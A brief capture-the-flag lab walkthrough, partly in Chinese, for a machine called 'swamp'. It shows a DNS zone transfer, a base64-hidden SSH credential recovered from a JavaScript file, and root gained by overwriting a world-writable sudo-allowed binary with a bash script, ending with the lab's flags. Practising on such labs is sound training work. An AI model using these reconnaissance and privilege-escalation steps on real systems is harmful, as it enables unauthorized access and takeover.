; <<>> DiG 9.20.4-4-Debian <<>> axfr @192.168.108.133 swamp.nyx ; (1 server found) ;; global options: +cmd swamp.nyx. 604800 IN SOA ns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800 swamp.nyx. 604800 IN NS ns1.swamp.nyx. d0nkey.swamp.nyx. 604800 IN A 0.0.0.0 dr4gon.swamp.nyx. 604800 IN A 0.0.0.0 duloc.swamp.nyx. 604800 IN A 0.0.0.0 f1ona.swamp.nyx. 604800 IN A 0.0.0.0 farfaraway.swamp.nyx. 604800 IN A 0.0.0.0 ns1.swamp.nyx. 604800 IN A 0.0.0.0 shr3k.swamp.nyx. 604800 IN A 0.0.0.0 swamp.nyx. 604800 IN SOA ns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800 ;; Query time: 0 msec ;; SERVER: 192.168.108.133#53(192.168.108.133) (TCP) ;; WHEN: Mon May 26 08:22:55 CST 2025 ;; XFR size: 10 records (messages 1, bytes 309)
都没东西,访问到farfaraway.swamp.nyx时发现给了个js文件
仔细看里面存在一个base64加密过后的编c2hyZWs6cHV0b3Blc2FvZWxhc25v
解密后得到一个凭证:shrek:putopesaoelasno
用此凭证登录ssh,发现登录成功
1 2 3 4 5 6
shrek@swamp:~$ sudo -l Matching Defaults entries for shrek on swamp: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User shrek may run the following commands on swamp: (ALL) NOPASSWD: /home/shrek/header_checker
返回了(ALL) NOPASSWD: /home/shrek/header_checker
1 2
**shrek@swamp:~$ ls -l /home/shrek/header_checker -rwsrwxrwx 1 root root 17736 Jan 4 14:23 /home/shrek/header_checker**
发现有suid位,并且可以吸入将bash写入
1 2 3 4 5 6 7 8 9 10 11 12
shrek@swamp:~$ echo -e '#!/bin/bash\n/bin/bash' > /home/shrek/header_checker shrek@swamp:~$ chmod +x /home/shrek/header_checker chmod: changing permissions of '/home/shrek/header_checker': Operation not permitted shrek@swamp:~$ sudo /home/shrek/header_checker root@swamp:/home/shrek# root@swamp:/home/shrek# cat user.txt 7d199d72f12135ef193ad19faf9468ef root@swamp:/home/shrek# cd ~ root@swamp:~# ls root.txt root@swamp:~# cat root.txt 9c7bddee2e2fb8ad03854f106f23c6b5
